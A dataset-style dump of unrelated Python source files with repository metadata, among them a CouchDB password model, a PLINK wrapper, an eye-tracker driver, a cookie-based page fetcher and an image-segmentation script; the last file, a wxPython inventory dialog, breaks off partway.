2011-09-24T23:49:54
2,452,412
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import couchdb, couchdb.design server = couchdb.Server() try: db = server.create('passwords') except couchdb.PreconditionFailed: db = server['passwords'] users_by_name = couchdb.design.ViewDefinition('users', 'users_by_name', """ function(doc) { if ( doc.type == 'user' ) emit([doc._id, 0]); if ( doc.type == 'password' ) emit([doc.user, 1]); }""") users_by_name.sync(db) class ValidationError(Exception): pass class ObjectDoesNotExist(Exception): pass class CouchManager(object): def __init__(self): self.model = None def get_by_id(self, id): try: doc = db[id] except couchdb.ResourceNotFound as e: if e.args == (('not_found', 'missing'),): raise self.model.DoesNotExist() else: raise obj = self.model() for field in doc: setattr(obj, field, doc[field]) return obj def __get__(self, obj, type=None): if obj is None: # I think mutating self here will cause problems with model inheritance self.model = type return self else: raise Exception("Can't access manager from instance") class CouchModelMeta(type): def __new__(cls, name, bases, dict): new = type.__new__(cls, name, bases, dict) if not hasattr(new, 'objects'): new.objects = CouchManager() new.DoesNotExist = type('%s.DoesNotExist' % (name), (ObjectDoesNotExist,), {}) return new class CouchModel(object): __metaclass__ = CouchModelMeta def __init__(self, **kwargs): self._id = None self._rev = None self.type = self.__class__.__name__.lower() for column in kwargs: setattr(self, column, kwargs[column]) def save(self): self.validate() (self._id, self._rev) = db.save(self.as_dict()) def validate(self): pass def as_dict(self): data = {} if self._rev: data['_rev'] = self._rev if self._id: data['_id'] = self._id return data class UserManager(CouchManager): def with_passwords(self, user_name): """ Get a user by name along with all their passwords. It'd be nice to user objects.get_by_id(users_by_name).with_passwords(), like a django queryset, but I'm not sure how to do that yet. """ rows = db.view('users/users_by_name', startkey=(user_name, 0), endkey=(user_name, 2), include_docs=True) rows = list(rows) if not rows: raise self.model.DoesNotExist user = User(**(rows[0].doc)) user._passwords = [row.doc for row in rows[1:]] return user class User(CouchModel): objects = UserManager() def as_dict(self): data = super(User, self).as_dict() data.update({ '_id': self._id, 'type': 'user' }) return data def validate(self): if not self._id: raise ValidationError @property def name(self): return self._id @name.setter def name(self, value): self._id = value @property def passwords(self): try: return self._passwords except AttributeError: rows = db.view('users/users_by_name', startkey=(self.name, 0), endkey=(self.name, 2), include_docs=True) self._passwords = [row.doc for row in rows] return self._passwords class Password(CouchModel): def as_dict(self): data = super(Password, self).as_dict() data.update({ 'type': 'password', 'password': self.password, 'user': self.user, }) return data
UTF-8
Python
false
false
2,011
7,507,602,884,445
42f25abe90f573b00460db59f843ea9072df789a
98c6ea9c884152e8340605a706efefbea6170be5
/examples/data/Assignment_8/grgvic001/question2.py
b8a938656de8ef012d703c6acd60e94dc0da95e0
[]
no_license
MrHamdulay/csc3-capstone
https://github.com/MrHamdulay/csc3-capstone
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
refs/heads/master
2021-03-12T21:55:57.781339
2014-09-22T02:22:22
2014-09-22T02:22:22
22,372,174
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#count number of double characters with recursion
#victor gueorguiev
#03 May 2014

def count_double_char(n):
    if len(n) <= 1:
        return 0
    if n[0] == n[1]:
        return 1 + count_double_char(n[2:])
    else:
        return count_double_char(n[1:])

def main():
    x = input('Enter a message:\n')
    print('Number of pairs:', str(count_double_char(x)))

main()
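An illustration of how the recursion counts non-overlapping pairs (not part of the assignment file):

# "aabbc" contains the pairs "aa" and "bb"; a matched pair consumes both characters.
assert count_double_char("aabbc") == 2
assert count_double_char("aaa") == 1
assert count_double_char("abc") == 0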
UTF-8
Python
false
false
2,014
8,280,696,986,407
c55ae24beca1ab1a7f0494437b8d5004192d221d
93f8128c0b187cb4aeaf0d27e046d4e90c91ec71
/drivers/eat/tracking_unified.py
b701e55f9df4a6edf416fee6d2b5af5555ecacf3
[]
no_license
FreeBCI/openbci
https://github.com/FreeBCI/openbci
56cedea748d449753daab91382acfc66887515c5
c9261199d99d18b09575604d075deb25e38f21a1
HEAD
2016-09-08T04:11:05.998775
2013-08-28T07:35:10
2013-08-28T07:35:10
12,414,484
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- import random, time import sys, signal from multiplexer.multiplexer_constants import peers, types from obci.control.peer.configured_client import ConfiguredClient from tobii import eye_tracking_io import tobii.eye_tracking_io.eyetracker import tobii.eye_tracking_io.mainloop import tobii.eye_tracking_io.browsing import tobii.eye_tracking_io.types #dummy import when no access to a real eyetracker #import eye_tracking_io.eyetracker #import eye_tracking_io.mainloop #import eye_tracking_io.browsing #import eye_tracking_io.types from obci.configs import settings, variables_pb2 import logging import threading class EtrAmplifierTobii(ConfiguredClient): @staticmethod def extract_channels(d): return [d.LeftEyePosition3D.x, d.LeftEyePosition3D.y, d.LeftEyePosition3D.z, d.LeftEyePosition3DRelative.x, d.LeftEyePosition3DRelative.y, d.LeftEyePosition3DRelative.z, d.LeftGazePoint3D.x, d.LeftGazePoint3D.y, d.LeftGazePoint3D.z, d.LeftGazePoint2D.x, d.LeftGazePoint2D.y, d.LeftPupil, float(d.LeftValidity), d.RightEyePosition3D.x, d.RightEyePosition3D.y, d.RightEyePosition3D.z, d.RightEyePosition3DRelative.x, d.RightEyePosition3DRelative.y, d.RightEyePosition3DRelative.z, d.RightGazePoint3D.x, d.RightGazePoint3D.y, d.RightGazePoint3D.z, d.RightGazePoint2D.x, d.RightGazePoint2D.y, d.RightPupil, float(d.RightValidity) ] def __init__(self, addresses): super(EtrAmplifierTobii, self).__init__(addresses=addresses, type=peers.AMPLIFIER) self.logger.info("Start initializing eat amplifier...") #....init etr self._init_signals() self.connector = TrackingConnector() self.ready() self.apply_calibration() def apply_calibration(self): calibration_data_path = self.get_param("calibration_data_path") if calibration_data_path: self.connector.upload_calibration(calibration_data_path) def _process_message(self, msg): self.logger.debug("ETR sending message...") self.conn.send_message(message = msg.SerializeToString(), type = types.AMPLIFIER_SIGNAL_MESSAGE, flush=True) def _init_signals(self): signal.signal(signal.SIGTERM, self.signal_handler()) signal.signal(signal.SIGINT, self.signal_handler()) def signal_handler(self): def handler(signum, frame): self.logger.info("Got signal " + str(signum) + "!!! TUrning etr off!") # some cleanup ... 
sys.exit(-signum) return handler def _gaze_to_packets(self, source): sample_count = 0 packet = variables_pb2.SampleVector() samples_per_packet = int(self.get_param("samples_per_packet")) for gaze_data in source: sample = packet.samples.add() sample.timestamp = int(time.time()) sample.channels.extend(self.extract_channels(gaze_data)) sample_count += 1 if sample_count == samples_per_packet: yield packet packet = variables_pb2.SampleVector() sample_count = 0 def tracking(self): return self._gaze_to_packets(self.connector.tracking()) def run(self): for sample_packet in self.tracking(): self._process_message(sample_packet) class DiscoveryContext(object): def __init__(self): self.condition = threading.Condition() self.eyetracker_info = None class ConnectionContext(object): def __init__(self): self.condition = threading.Condition() self.eyetracker = None class TrackingContext(object): def __init__(self): self.condition = threading.Condition() self.last_sample = None class TrackingConnector(object): def __init__(self): self.logger = logging.getLogger("eat_amplifier") self.eyetracker = None self.eyetracker_info = None self.tracking_context = None eye_tracking_io.init() self._detect_eyetracker() self._connect_to_eyetracker() def _detect_eyetracker(self): mainloop = eye_tracking_io.mainloop.MainloopThread() context = DiscoveryContext() browser = eye_tracking_io.browsing.EyetrackerBrowser(mainloop, self.browsing_callback, context) with context.condition: context.condition.wait(7) #mainloop.stop() if context.eyetracker_info: self.eyetracker_info = context.eyetracker_info else: raise Exception("No eyetracker found") browser.stop() def browsing_callback(self, _id, message, eyetracker_info, *args): context = args[0] if message == 'Found': with context.condition: context.eyetracker_info = eyetracker_info context.condition.notify() def _connect_to_eyetracker(self): mainloop = eye_tracking_io.mainloop.MainloopThread() context = ConnectionContext() eye_tracking_io.eyetracker.Eyetracker.create_async(mainloop, self.eyetracker_info, self.connect_callback, context) with context.condition: context.condition.wait(7) if context.eyetracker: self.eyetracker = context.eyetracker else: raise Exception("Could not connect to eyetracker") def connect_callback(self, _error, eyetracker, context): with context.condition: context.eyetracker = eyetracker context.condition.notify() def tracking(self): try: self.tracking_context = TrackingContext() self.eyetracker.StartTracking(None) self.eyetracker.events.OnGazeDataReceived += self.tracking_handler while True: with self.tracking_context.condition: self.tracking_context.condition.wait(0.03) last_sample = self.tracking_context.last_sample self.tracking_context.last_sample = None if last_sample: yield last_sample finally: self.eyetracker.events.OnGazeDataReceived -= self.tracking_handler self.eyetracker.StopTracking() def tracking_handler(self, _error, gaze): with self.tracking_context.condition: self.tracking_context.last_sample = gaze self.tracking_context.condition.notify() def upload_calibration(self, path): calibration_file = open(path, "rb") calibration = eye_tracking_io.converters.Calibration(calibration_file.read()) self.eyetracker.SetCalibration(calibration) if __name__ == "__main__": EtrAmplifierTobii(settings.MULTIPLEXER_ADDRESSES).run()
UTF-8
Python
false
false
2,013
14,353,780,716,428
bb9292b01d88bf9bae25fc5c1422204cdb532a9e
9033971d873728ed3f9ea16fafb82b474e4c8ba5
/magic/plink/plink_wrapper.py
ba619709668578b0c95583a4bf0fef0ca79bd43d
[]
no_license
dtgillis/MAGiC
https://github.com/dtgillis/MAGiC
a2c6ef75b06635eb91fc2d4e4ff767d64eaceb1c
6fc37d277ffab96603583f208de7339902d2370f
refs/heads/master
2016-09-10T01:34:52.713618
2014-12-10T02:22:24
2014-12-10T02:22:24
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
__author__ = 'dtgillis' import os class SampleGenotype(): def __init__(self, sample_list, genotype_list, snp_name): self.sample_list = sample_list self.genotype_list = genotype_list self.snp_name = snp_name class PlinkExecutableWrapper(): def __init__(self, plink_executable_path=None): self.plink_found = False if plink_executable_path is None: for path in os.environ["PATH"].split(os.pathsep): if os.path.isfile(path + os.sep + 'plink'): self.plink_exec = path + os.sep + 'plink' self.plink_found = True print self.plink_exec else: if os.path.isfile(plink_executable_path): self.plink_found = True self.plink_exec = plink_executable_path if self.plink_found: print "Found plink executable" def extract_snps_recode(self, map_file, ped_file, snp, tmp_dir): #form the command for the plink execution cmd = '{0:s} --noweb --ped {1:s} --map {2:s} --map3 --no-pheno --recodeA --snp {3:s}' \ ' --out {4:s}{5:s}{3:s} > /dev/null'.format(self.plink_exec, ped_file, map_file, snp, tmp_dir, os.sep) os.system(cmd) def parse_snp_recode_raw(self, snp, tmp_dir): recode_file = tmp_dir + os.sep + snp + '.raw' if not os.path.isfile(recode_file): print "error reading plink file {0:s}".format(recode_file) exit(1) lines = open(tmp_dir + os.sep + snp + '.raw', 'r').readlines() #splice out split_lines = [line.strip(os.linesep).split() for line in lines[1:]] genotype_list = [] sample_list = [] for record in split_lines: if record[-1] != 'NA': sample_list.append(record[0]) genotype_list.append(int(record[-1])) sample_genotype = SampleGenotype(sample_list, genotype_list, snp) return sample_genotype def clean_up_directory(self, tmp_dir, snp): file_start = tmp_dir + os.sep + snp for ext in ['.raw', '.nof', '.log']: if os.path.isfile(file_start + ext): os.remove(file_start + ext)
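A hypothetical driver for the wrapper above; the .map/.ped paths, the SNP id and the temp directory are invented, and plink is assumed to be on PATH (or passed explicitly to the constructor).

# Hypothetical usage of PlinkExecutableWrapper (paths and SNP id are invented).
wrapper = PlinkExecutableWrapper()
if wrapper.plink_found:
    wrapper.extract_snps_recode(map_file='study.map', ped_file='study.ped',
                                snp='rs123456', tmp_dir='/tmp/plink_work')
    genotypes = wrapper.parse_snp_recode_raw(snp='rs123456', tmp_dir='/tmp/plink_work')
    print genotypes.sample_list[:5], genotypes.genotype_list[:5]
    wrapper.clean_up_directory('/tmp/plink_work', 'rs123456')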
UTF-8
Python
false
false
2,014
6,992,206,785,053
ee04e78dd0900b3a9007d46a8182d17c2383554b
1014ce5222cadd7a4ea7f5c639f5a8602bd3cebc
/python-master/InterpreterOverridings.py
5df3daf94e89c21040d69ebe18e00655a55bade2
[]
no_license
schwidom/pl-lisp
https://github.com/schwidom/pl-lisp
4ad9dfdcb87868a07cb6a85534c7fca5d13456c3
ea67d08f63659ec37ed4da18bd498b631764eb3e
refs/heads/master
2021-01-01T05:37:45.908974
2012-09-08T14:42:12
2012-09-08T14:42:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class InterpreterOverridings:
    def __init__(self):
        self.ess_ess_pront = []

    def ess_ess_print(self, *l):
        # construction note: overriding this on the PL-Lisp side would be cleaner 8c231655685648cc99e5b0bf3b0b8687
        self.ess_ess_pront.append(l)

    def setInputString(self, input_string):
        # an empty string works
        self.input_string = input_string
        self.eof = False

    def setEOF(self):
        self.eof = True

    def readTokenRawInput(self):
        if None == self.input_string and self.eof:
            raise EOFError()
        ret = self.input_string
        self.input_string = None
        return ret

    def s_print(self, *l):
        pass
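A minimal illustration of the hooks (not part of the source file): feed one raw input string, read it back once, and inspect the captured print calls.

interp = InterpreterOverridings()
interp.setInputString("(+ 1 2)")
print(interp.readTokenRawInput())   # -> "(+ 1 2)"; the buffered string is consumed
interp.ess_ess_print("hello", 42)
print(interp.ess_ess_pront)         # -> [('hello', 42)]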
UTF-8
Python
false
false
2,012
5,557,687,714,775
e31ef63afdba35af7cc2b2c88518d1cfb0d8a05d
bed0cb41dbf51ab592ee7d72b931662c98c35a56
/test_base/__init__.py
12cc88f8ec55e0ac2317dfaa6464b5f4d714bf6e
[]
no_license
travisfischer/cqlengine-test-base
https://github.com/travisfischer/cqlengine-test-base
e9f75b926f237b8e0ade7e0ed2b104a16a6917e8
cd6c792cbdff638356fc9d6defb4fa6abb6246b5
refs/heads/master
2016-09-06T09:22:21.158906
2014-08-04T01:51:43
2014-08-04T01:51:43
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from keyspace_manager import PersistenceTestCase
UTF-8
Python
false
false
2,014
11,209,864,665,329
89abb5f3478bff167902c0defa1b6f213459a29e
febdd9a0b1a618ee51d716df59bb572c7e3cc2dd
/page_getter.py
4b59d47e96d98302d47928ba58d4799e1a43fd9a
[]
no_license
wiggin15/CookiePageGetter
https://github.com/wiggin15/CookiePageGetter
9478e53c8870ef9c81c26a26089ddf012d80da40
ef49b29731003c7b6250aa842deff075fdb7707d
refs/heads/master
2020-01-21T16:24:50.740458
2013-01-19T18:08:43
2013-01-19T18:08:43
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from __future__ import print_function import re import os import gzip try: from http.cookiejar import LWPCookieJar from urllib.parse import urlencode from urllib.request import build_opener, HTTPCookieProcessor, Request from io import BytesIO except ImportError: # Python 2.x from cookielib import LWPCookieJar from urllib import urlencode from urllib2 import build_opener, HTTPCookieProcessor, Request from StringIO import StringIO as BytesIO bytes = str COOKIEFILE = 'cookies.lwp' USER_AGENT = "Opera/9.80" #USER_AGENT = "Mozilla/5.0 (compatible; MSIE 7.0)" ### Logger ############################## class Logger(object): """ prints to stdout and optionally to a file """ def __init__(self, log_file=None): if log_file is not None: self.log_file = open(log_file, "wb") else: self.log_file = None def __del__(self): if self.log_file is not None: self.log_file.close() def log(self, text): try: print(text) except UnicodeEncodeError: pass # can't print unicode to console if self.log_file is not None: self.log_file.write((text + os.linesep).encode("utf-8")) self.log_file.flush() class SilentLogger(object): """ logger that doesn't log """ def log(self, text): pass ### CookiePageGetter #################### class CookiePageGetter(object): def __init__(self, username=None, password=None, cookiefile=None, logger=None): self.bandwidth = 0 self.logger = logger or SilentLogger() self.cookiefile = cookiefile or COOKIEFILE self.cj = LWPCookieJar() if os.path.isfile(self.cookiefile): self.cj.load(self.cookiefile) self.opener = build_opener(HTTPCookieProcessor(self.cj)) self.opener.addheaders = [("User-Agent", USER_AGENT)] self.opener.addheaders.append(("Accept-Encoding", "gzip")) if not os.path.isfile(self.cookiefile) and username is not None and password is not None: self.logger.log("Logging in") self.log_in(username, password) self.html_encoding = "utf-8" def log_in(self): pass def _read_in_chunks(self, response): data = bytes() while True: small_data = response.read(1024) self.bandwidth += len(small_data) if len(small_data) == 0: break data += small_data return data def _open_with_retry(self, request): # sometimes there are timeouts and such - try to open the page 10 times until giving up for i in range(10): try: response = self.opener.open(request) if i != 0: self.logger.log("* Recovered from open error after %d tries" % i) return response except: pass return None def _prepare_request(self, request, additional_headers, post_data): if additional_headers is not None: for k, v in additional_headers.items(): request.add_header(k, v) if post_data is not None: request.add_data(urlencode(post_data).encode("ascii")) def _request(self, url, additional_headers=None, post_data=None): request = Request(url) self._prepare_request(request, additional_headers, post_data) response = self._open_with_retry(request) if response is None: self.logger.log("* ERROR Could not open <%s>" % url) return bytes() data = self._read_in_chunks(response) self.cj.save(self.cookiefile) # handle gzip'd data if response.info().get("Content-Encoding") == "gzip": gzip_stream = BytesIO(data) gzip_file = gzip.GzipFile(fileobj=gzip_stream) data = gzip_file.read() self._update_encoding(response) return data def get_page_html(self, url, additional_headers=None, post_data=None): data = self._request(url, additional_headers, post_data) data = data.decode(self.html_encoding) return data def download_binary(self, url, fname): data = self._request(url) open(fname, "wb").write(data) def _update_encoding(self, response): content_type = 
response.info().get('content-type') if content_type is None: return matchobj = re.search("charset=([^;]+)", content_type) if matchobj is None: return self.html_encoding = matchobj.group(1) def _format_size(self, bytes): suffixes = ['T', 'G', 'M', 'K', ''] bytes = [bytes] for i in range(len(suffixes)-1): bytes = list(divmod(bytes[0], 1024)) + bytes[1:] return ', '.join(["%d %sB" % (val, suf) for val, suf in zip(bytes, suffixes) if val != 0]) def log_bandwidth(self): self.logger.log("%s transferred" % (self._format_size(self.bandwidth)))
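A hypothetical use of the class as-is (the URL is illustrative); with no username/password it simply reuses cookies.lwp when present and fetches anonymously.

# Hypothetical usage; example.com stands in for a real site.
getter = CookiePageGetter(logger=Logger())
html = getter.get_page_html("http://example.com/")
getter.download_binary("http://example.com/logo.png", "logo.png")
getter.log_bandwidth()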
UTF-8
Python
false
false
2,013
987,842,486,858
57bedfb9dcf5af58e6aff41ed34429292f401e88
9e29e4542bfec6ec132f723b9e51beb681718659
/experimental/flavors/adapter.py
4be78be135eb72da5901ecd650060ce47bf9a12e
[]
no_license
seanupton/experimental.flavors
https://github.com/seanupton/experimental.flavors
3f4a1fa8afa29493b46ae087d2d91a4db137fca2
068e94e9452020e7aff7273ce2df51a7dc3c41ff
refs/heads/master
2016-08-04T20:54:44.375901
2012-07-19T20:55:11
2012-07-19T20:55:11
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from plone.behavior.interfaces import IBehavior
from plone.dexterity.behavior import DexterityBehaviorAssignable
from zope.annotation.interfaces import IAnnotations
from zope.component import adapts, queryUtility

import interfaces


class FlavorBehaviorAssignable(DexterityBehaviorAssignable):
    """
    Locally stored flavors for instance plus behaviors for FTI.

    Flavor names are behavior names: both reference the same dotted name of
    behavior interface, so enumeration can just use the flavor name without
    looking up an IFlavor utility to get metadata (since that metadata is
    for display, its primary use is in vocabularies, not here).
    """

    adapts(interfaces.IFlavorAware)

    def __init__(self, context):
        self.flavor_names = []
        self.context = context
        super(FlavorBehaviorAssignable, self).__init__(context)
        anno = IAnnotations(context)
        if interfaces.FLAVORS_KEY in anno:
            self.flavor_names = list(anno.get(interfaces.FLAVORS_KEY))

    def enumerateBehaviors(self):
        behaviors = list(self.fti.behaviors) + self.flavor_names
        for name in behaviors:
            behavior = queryUtility(IBehavior, name=name)
            if behavior is not None:
                yield behavior
UTF-8
Python
false
false
2,012
3,693,671,889,006
781096e15129060dd0266fe01ad3bf46f5e5a3f9
6cfffd460857c9f959a5f55f9c78a49273dfff47
/plot_lena_meanshift.py
f0d6edda10dc92c6833925ffe3559384fb664896
[]
no_license
NelleV/IMANU
https://github.com/NelleV/IMANU
4ed04d686671456d3b9a3c90b2b25fd1d76ba350
a11c7c4f1f079ab13abfd7e72dfafef9f597ee39
refs/heads/master
2016-09-05T10:53:22.257754
2012-01-16T17:20:49
2012-01-16T17:20:49
2,651,919
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" ============================================ Segmenting Lena into region using mean shift ============================================ """ # Author: Nelle Varoquaux <[email protected]> # License: BSD import numpy as np import scipy as sp from matplotlib import pyplot as plt from mpl_toolkits.mplot3d import Axes3D from sklearn.cluster.mean_shift_ import MeanShift, estimate_bandwidth from sklearn.externals.joblib import Memory mem = Memory(cachedir='.') def calculate_cluster(lena, lena_mat, quantile): bandwidth = estimate_bandwidth(lena_mat, quantile=quantile, n_samples=500) ms = MeanShift(bandwidth=bandwidth, bin_seeding=True) ms.fit(lena_mat) labels = ms.labels_ cluster_centers = ms.cluster_centers_ labels_unique = np.unique(labels) n_clusters_ = len(labels_unique) lena_clustered = lena.copy() lena_clustered_value = lena.copy() lena_mat_clustered = lena_mat.copy() lena_mat_clustered_value = lena_mat.copy() for point, pointb, value in zip(lena_mat_clustered, lena_mat_clustered_value, labels): point[2] = value pointb[2] = cluster_centers[value, 2] lena_clustered[point[0], point[1]] = value lena_clustered_value[point[0], point[1]] = cluster_centers[value, 2] image = {"image": lena_clustered_value, "quantile": quantile, "clusters": n_clusters_} return image lena = sp.misc.lena() # My computer is crap - I don't have enough ram to compute the clustering on # the whole lena image. Let's downsample the image by a factor of 4 #lena = lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2] + lena[1::2, 1::2] #lena = lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2] + lena[1::2, 1::2] # Lena as an image is useless. Let's create a 512*3 matrix (x, y, value) lena_mat = [] for x, i in enumerate(lena): for y, j in enumerate(i): lena_mat.append([x, y, j]) lena_mat = np.array(lena_mat) quantile_range = np.linspace(0.004, 0.02, 11) images = [] images.append({"image": lena.copy(), "quantile": 0, "clusters": 0}) for i, quantile in enumerate(quantile_range): print "%d calculating for quantile %f" % (i, quantile) image = mem.cache(calculate_cluster)(lena, lena_mat, quantile) images.append(image) fig = plt.figure() for i, image in enumerate(images): ax = fig.add_subplot(4, 3, i) ax.set_axis_off() ax.set_title('clusters: %d - quantile %f' % (image['clusters'], image['quantile'])) ax.matshow(image['image']) #fig = plt.figure(1) #ax = fig.add_subplot(111, projection='3d') # #ax.plot(lena_mat[:, 0], lena_mat[:, 1], lena_mat[:, 2], 'w', #markerfacecolor='#111111', marker='.') # #plt.show() # # Let's display some of the results
UTF-8
Python
false
false
2,012
1,065,151,921,575
f816d6c3cfeeb0de5725305341a455f84df09c78
01854de172ef95a2583c3b43d52e69c684ac5c0f
/laser.py
9a7602b58a0d1055c83ad43020469fe31e8807e5
[ "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-proprietary-license" ]
non_permissive
dangillet/space_tactical
https://github.com/dangillet/space_tactical
261197bf3b06344e6505c80ec196ec79ccf47bf5
4c1e0b1757d7a1773ecd880567a6d0781f11d1f0
refs/heads/master
2016-09-10T23:38:42.137506
2013-11-10T14:12:47
2013-11-10T14:12:47
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from cocos import draw

class LaserBeam(draw.Canvas):
    def __init__(self):
        super(LaserBeam, self).__init__()
        self.pos_from = (0, 0)
        self.pos_to = (0, 0)
        self.visible = False

    def render(self):
        self.set_endcap(draw.ROUND_CAP)
        self.set_color((255, 0, 0, 200))
        self.set_stroke_width(5)
        self.move_to(self.pos_from)
        self.line_to(self.pos_to)
        self.set_color((255, 180, 180, 200))
        self.set_stroke_width(2)
        self.move_to(self.pos_from)
        self.line_to(self.pos_to)
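A hypothetical way to put the beam on screen with cocos2d; the layer and coordinates are invented, and exact redraw behaviour depends on the cocos version.

import cocos

layer = cocos.layer.Layer()
beam = LaserBeam()
beam.pos_from = (100, 100)
beam.pos_to = (400, 300)
beam.visible = True
layer.add(beam)  # render() draws the thick red stroke with a lighter core on top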
UTF-8
Python
false
false
2,013
7,997,229,113,067
a9c2c70199bc64cbdfbb66d7533ede972638db58
4ffc4143729753ebc392b66d3e87a5c68976151a
/parseresults_iperf.py
c3674c8e7420e268ffaf4e8ed1e99fa58f797a78
[]
no_license
initiumsys/ansible-checkinf
https://github.com/initiumsys/ansible-checkinf
386749d75b07e4d7bb7b30f68a186b58695b244c
77f3cd2c7b5bce46d31de84f063f3e9970a37376
refs/heads/master
2021-05-19T19:38:19.948471
2014-07-08T10:28:54
2014-07-08T10:28:54
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import sys import os, fnmatch import re import sys, getopt def main(argv): inputpath = '' outputfile = '' typefiles = '' try: myopts, args = getopt.getopt(sys.argv[1:],"i:o:t:") except getopt.GetoptError as e: print (str(e)) print ("Usage %s -t [imas_a | imas_b] -i <inputpath> -o <outputfile>" % sys.argv[0]) sys.exit(2) for opt, arg in myopts: if opt == '-h': print ("Usage %s -t [imas_a | imas_b] -i <inputpath> -o <outputfile>" % sys.argv[0]) sys.exit() elif opt in ("-i", "--ipath"): inputpath = arg elif opt in ("-o", "--ofile"): outputfile = arg elif opt in ("-t", "--ttype"): typefiles = arg #print 'Input path is "', inputpath #print 'Output file is "', outputfile #print 'Type is "', typefiles # print("%s\t %s\t %s\t %s\t%s" % # ("HOST","Transfer","Bandwith","Jitter","Losts / Total")) fout = open(outputfile, 'w') fout.write("%s\t %s\t %s\t %s\t%s\t%s\n" % ("Host","Transfer","Bandwith","Jitter","Losts / Total", "Result")) for dirpath, dirs, files in os.walk(inputpath): for filename in fnmatch.filter(files, typefiles+"*"): #fout.write(filename+"\n") with open(os.path.join(dirpath, filename)) as f: # one file open, handle it, next loop will present you with a new file #fout.write(f.read()) for line in f: matchFile = re.match( r'imas_[a|b]_(.*)', filename, re.M|re.I) #[ 3] 0.0-30.0 sec 2.78 GBytes 797 Mbits/sec 0.034 ms 241/58595 (0.41%) matchObj = re.match( r'.* sec (.*ytes) (.*its/sec) (.*ms) (.*) \((.*)%\)', line, re.M|re.I) if matchFile and matchObj: errores = float(matchObj.group(5)) hayErrores = "OK" if errores > 0.1: hayErrores = "ERROR !!!" # print("%s %s %s\t%s %s (%s%s)\t%s" % # (matchFile.group(1), # matchObj.group(1), # matchObj.group(2), # matchObj.group(3), # matchObj.group(4), # matchObj.group(5), # "%", # hayErrores)) fout.write("%s %s %s\t%s %s (%s%s)\t%s\n" % (matchFile.group(1), matchObj.group(1), matchObj.group(2), matchObj.group(3), matchObj.group(4), matchObj.group(5), "%", hayErrores)) fout.close() if __name__ == "__main__": main(sys.argv[1:])
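The script is meant to be run from the command line; its usage string is reproduced below, together with a quick check of the result regex against the sample iperf line quoted in the source comment (the flags mirror the script).

# Command-line form, from the script's own usage message:
#   parseresults_iperf.py -t [imas_a | imas_b] -i <inputpath> -o <outputfile>
import re

line = '[  3]  0.0-30.0 sec  2.78 GBytes   797 Mbits/sec   0.034 ms  241/58595 (0.41%)'
m = re.match(r'.* sec (.*ytes) (.*its/sec) (.*ms) (.*) \((.*)%\)', line, re.M | re.I)
if m:
    transfer, bandwidth, jitter, losts, pct = [g.strip() for g in m.groups()]
    print(transfer, bandwidth, jitter, losts, pct)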
UTF-8
Python
false
false
2,014
7,851,200,238,086
88c081efcd8f10d217e45dc28de75e8773642278
778d56550129d127b048ef227a5cc2cf8dec4418
/popups/inventory.py
75a3afb07026fe2ac6a13ca7404dfc80b54233d5
[ "GPL-2.0-only" ]
non_permissive
johm/infoshopkeeper
https://github.com/johm/infoshopkeeper
aeccc1a20ec33e0f53ca9470a722d6572ac24b36
cb06b1ff89dbc5a850afbc801357cf651867e0e0
refs/heads/master
2016-09-06T11:11:52.551777
2012-10-20T23:25:48
2012-10-20T23:25:48
2,958,444
5
2
null
null
null
null
null
null
null
null
null
null
null
null
null
# Copyright 2006 John Duda # This file is part of Infoshopkeeper. # Infoshopkeeper is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or any later version. # Infoshopkeeper is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # You should have received a copy of the GNU General Public License # along with Infoshopkeeper; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from objects.kind import Kind from objects.author import Author from wxPython.wx import * from infoshopkeeper_config import configuration from popups.author import ChooseAuthorsPopup import urllib import string from controls.multiplePrices import multiplePrices import os cfg = configuration() bookStatus = cfg.get("bookStatus") econoscan=cfg.get('econoscan') try: if os.uname()[0]=="Linux": ON_LINUX=True # : ) else: ON_LINUX=False except: ON_LINUX=False # :( class InventoryPopup(wxDialog): def __init__(self,parent): self.known_title=False self.parent=parent self.trailing_two=False self.selected_kind = cfg.get("default_kind") if isinstance(bookStatus, tuple): self.statuses=bookStatus else: self.statuses = False self.keybuffer="" wxDialog.__init__(self, parent,-1,"Merchandise Details") # self.SetBackgroundColour("FIREBRICK") self.SetSize((400, 570)) self.master_sizer=wxBoxSizer(wxVERTICAL) self.toprow=wxBoxSizer(wxHORIZONTAL) self.toprow_col1=wxBoxSizer(wxVERTICAL) self.toprow_col2=wxBoxSizer(wxVERTICAL) self.static0=wxStaticText(self, -1, "Item ID (UPC or ISBN):") self.number=wxTextCtrl(id=-1,name="merchandise_id", parent=self, style=wxTE_PROCESS_ENTER) EVT_TEXT(self,self.number.GetId(), self.OnText) EVT_TEXT_ENTER(self,self.number.GetId(), self.OnTextEnter) if ON_LINUX: EVT_CHAR(self.number, self.OnKeyDown) self.toprow_col1.Add(self.static0,0,wxEXPAND|wxALL,5) self.toprow_col1.Add(self.number,0,wxEXPAND|wxALL,5) self.static0a=wxStaticText(self, -1, "Quantity:") self.quantity=wxTextCtrl(id=-1,name="quantity", parent=self, style=0) self.quantity.SetValue("1") self.toprow_col2.Add(self.static0a,0,wxEXPAND|wxALL,5) self.toprow_col2.Add(self.quantity,0,wxEXPAND|wxALL,5) self.toprow.Add(self.toprow_col1,0,wxEXPAND|wxALL,5) self.toprow.Add(self.toprow_col2,0,wxEXPAND|wxALL,5) 